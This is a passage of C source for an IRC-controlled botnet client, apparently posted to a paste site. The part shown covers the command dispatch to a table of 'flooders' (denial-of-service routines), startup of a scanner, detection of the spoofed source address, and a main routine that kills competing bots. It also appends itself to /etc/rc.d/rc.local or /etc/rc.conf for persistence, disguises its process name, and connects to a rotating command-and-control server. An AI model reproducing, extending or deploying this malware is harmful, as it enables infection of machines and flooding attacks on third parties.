  3122. strncpy(params[m],message,i);
  3123. params[m][i]=0;
  3124. m++;
  3125. message+=i;
  3126. }
  3127. for (m=0; flooders[m].cmd != (char *)0; m++) {
  3128. if (!strcasecmp(flooders[m].cmd,name)) {
  3129. flooders[m].func(sock, sender,num_params-1,params);
  3130. for (i=1;i<num_params;i++) free(params[i]);
  3131. return;
  3132. }
  3133. }
  3134. }
  3135. }
  3136. void _376(int sock, char *sender, char *str) {
  3137. Send(sock, "MODE %s -xi\n",nick);
  3138. Send(sock, "JOIN %s :%s\n",chan,key);
  3139. Send(sock, "WHO %s\n",nick);
  3140. startScanner(sock);
  3141. }
  3142. void _PING(int sock, char *sender, char *str) {
  3143. Send(sock, "PONG %s\n",str);
  3144. }
  3145. void _352(int sock, char *sender, char *str) {
  3146. int i,d;
  3147. char *msg=str;
  3148. struct hostent *hostm;
  3149. unsigned long m;
  3150. for (i=0,d=0;d<5;d++) {
  3151. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
  3152. if (i == strlen(str)) return;
  3153. }
  3154. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
  3155. msg[i]=0;
  3156. if (!strcasecmp(msg,nick) && !spoofsm) {
  3157. msg=str;
  3158. for (i=0,d=0;d<3;d++) {
  3159. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
  3160. if (i == strlen(str)) return;
  3161. }
  3162. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
  3163. msg[i]=0;
  3164. if ((m = inet_addr(msg)) == -1) {
  3165. if ((hostm=gethostbyname(msg)) == NULL) {
  3166. Send(sock, "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
  3167. return;
  3168. }
  3169. memcpy((char*)&m, hostm->h_addr, hostm->h_length);
  3170. }
  3171. ((char*)&spoofs)[3]=((char*)&m)[0];
  3172. ((char*)&spoofs)[2]=((char*)&m)[1];
  3173. ((char*)&spoofs)[1]=((char*)&m)[2];
  3174. ((char*)&spoofs)[0]=0;
  3175. spoofsm=256;
  3176. }
  3177. }
  3178. void _433(int sock, char *sender, char *str) {
  3179. free(nick);
  3180. nick=randstring(rand() % 9 + 4);
  3181. }
  3182. void _NICK(int sock, char *sender, char *str) {
  3183. int i;
  3184. for (i=0;i<strlen(sender) && sender[i] != '!';i++);
  3185. sender[i]=0;
  3186. if (!strcasecmp(sender,nick)) {
  3187. if (*str == ':') str++;
  3188. if (nick) free(nick);
  3189. nick=strdup(str);
  3190. }
  3191. }
  3192. struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
  3193. { "352", _352 },
  3194. { "376", _376 },
  3195. { "433", _433 },
  3196. { "422", _376 },
  3197. { "PRIVMSG", _PRIVMSG },
  3198. { "PING", _PING },
  3199. { "NICK", _NICK },
  3200. { (char *)0, (void (*)(int,char *,char *))0 } };
  3201. void con() {
  3202. struct sockaddr_in srv;
  3203. unsigned long ipaddr,start;
  3204. int flag;
  3205. struct hostent *hp;
  3206. start:
  3207. sock=-1;
  3208. flag=1;
  3209. if (changeservers == 0) server=servers[rand()%numservers];
  3210. changeservers=0;
  3211. while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
  3212. if (inet_addr(server) == 0 || inet_addr(server) == -1) {
  3213. if ((hp = gethostbyname(server)) == NULL) {
  3214. server=NULL;
  3215. close(sock);
  3216. goto start;
  3217. }
  3218. bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
  3219. }
  3220. else srv.sin_addr.s_addr=inet_addr(server);
  3221. srv.sin_family = AF_INET;
  3222. srv.sin_port = htons(6667);
  3223. ioctl(sock,FIONBIO,&flag);
  3224. start=time(NULL);
  3225. while(time(NULL)-start < 10) {
  3226. errno=0;
  3227. if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
  3228. setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
  3229. setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
  3230. setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
  3231. return;
  3232. }
  3233. if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
  3234. sleep(1);
  3235. }
  3236. server=NULL;
  3237. close(sock);
  3238. goto start;
  3239. }
  3240.  
  3241. int main(int argc, char **argv) {
  3242. int on,i;
  3243. char cwd[256],*str;
  3244. FILE *file;
  3245. botkill();
  3246. #ifdef STARTUP
  3247. str="/etc/rc.d/rc.local";
  3248. file=fopen(str,"r");
  3249. if (file == NULL) {
  3250. str="/etc/rc.conf";
  3251. file=fopen(str,"r");
  3252. }
  3253. if (file != NULL) {
  3254. char outfile[256], buf[1024];
  3255. int i=strlen(argv[0]), d=0;
  3256. getcwd(cwd,256);
  3257. if (strcmp(cwd,"/")) {
  3258. while(argv[0][i] != '/') i--;
  3259. sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
  3260. while(!feof(file)) {
  3261. fgets(buf,1024,file);
  3262. if (!strcasecmp(buf,outfile)) d++;
  3263. }
  3264. if (d == 0) {
  3265. FILE *out;
  3266. fclose(file);
  3267. out=fopen(str,"a");
  3268. if (out != NULL) {
  3269. fputs(outfile,out);
  3270. fclose(out);
  3271. }
  3272. }
  3273. else fclose(file);
  3274. }
  3275. else fclose(file);
  3276. }
  3277. #endif
  3278. if (fork()) exit(0);
  3279. #ifdef FAKENAME
  3280. strncpy(argv[0],FAKENAME,strlen(argv[0]));
  3281. for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
  3282. #endif
  3283. srand((time(NULL) ^ getpid()) + getppid());
  3284. nick=randstring(rand() % 9 + 4);
  3285. ident=randstring(rand() % 9 + 4);
  3286. user=randstring(rand() % 9 + 4);
  3287. chan=CHAN;
  3288. key=KEY;
  3289. server=NULL;
  3290. sa:
  3291. #ifdef IDENT
  3292. for (i=0;i<numpids;i++) {
  3293. if (pids[i] != 0 && pids[i] != getpid()) {
  3294. kill(pids[i],9);
  3295. waitpid(pids[i],NULL,WNOHANG);
  3296. }
  3297. }
  3298. pids=NULL;
  3299. numpids=0;
  3300. identd();
  3301. #endif
  3302. con();
  3303. Send(sock, "NICK %s|%s|%s\nUSER %s localhost localhost :%s\n", PREFIX, getBuild(),nick,user,ident);
  3304. while(1) {
  3305. unsigned long i;
  3306. fd_set n;
  3307. struct timeval tv;
  3308. FD_ZERO(&n);
  3309. FD_SET(sock,&n);
  3310. tv.tv_sec=60*20;
  3311. tv.tv_usec=0;
  3312. if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
  3313. for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
  3314. unsigned int *newpids,on;
  3315. for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
  3316. pids[on-1]=0;
  3317. numpids--;
  3318. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
  3319. for (on=0;on<numpids;on++) newpids[on]=pids[on];
  3320. free(pids);
  3321. pids=newpids;
  3322. }
  3323. if (FD_ISSET(sock,&n)) {
  3324. char buf[4096], *str;
  3325. int i;
  3326. if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
  3327. buf[i]=0;
  3328. str=strtok(buf,"\n");
  3329. while(str && *str) {
  3330. char name[1024], sender[1024];
  3331. filter(str);
  3332. if (*str == ':') {
  3333. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  3334. str[i]=0;
  3335. strcpy(sender,str+1);
  3336. strcpy(str,str+i+1);
  3337. }
  3338. else strcpy(sender,"*");
  3339. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  3340. str[i]=0;
  3341. strcpy(name,str);
  3342. strcpy(str,str+i+1);
  3343. for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock, sender,str);
  3344. if (!strcasecmp(name,"ERROR")) goto sa;
  3345. str=strtok((char*)NULL,"\n");
  3346. }
  3347. }
  3348. }
  3349. return 0;
  3350. }
RAW Paste Data